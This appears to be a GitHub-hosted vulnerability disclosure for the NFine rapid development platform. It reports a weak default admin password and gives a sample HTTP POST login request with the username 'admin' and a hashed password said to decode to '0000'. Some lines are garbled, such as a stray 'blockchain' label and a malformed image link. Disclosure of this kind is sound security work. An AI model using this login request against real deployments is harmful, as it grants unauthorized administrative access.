Skip to content

Latest commit

 

History

History
42 lines (33 loc) · 1.41 KB

NFine-Rapid-development-platform-has-weak-password-vulnerability.md

File metadata and controls

42 lines (33 loc) · 1.41 KB
Raw

Exploit Title: NFine-Rapid-development-platform-has-weak-password-vulnerability

Date: 2023-05/11

Exploit Author: Peanut886

Vendor Homepage: unknown

Version: unknown

Tested on: windows10 + phpstudy

Description

NFine-Rapid-development-platform-has-weak-password-vulnerability

Sample request POC

POST /#/CheckLogin HTTP/1.1
Host: target:port
Content-Length: 62
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: svc://target:port
Referer: svc://target:port/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=eoeoqday4vjurcnyz3wvlo4r; nfine_mac=03A6EA811D522D7299A2CD6BFB71E6EC
Connection: close

username=admin&password=4a7d1ed414474e4033ac29ccb8653d9b&code=

Return success

blockchain

passWord The encrypted content is 0000

Returns part of the package

![blockchain](https://github.com/Peanut886/Vulnerability/blob/main/imgs/2023-NFine-week-password/2023-05-11(1).jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2023-NFine-week-password/2023-05-11(2).jpg "NFine Rapid development platform")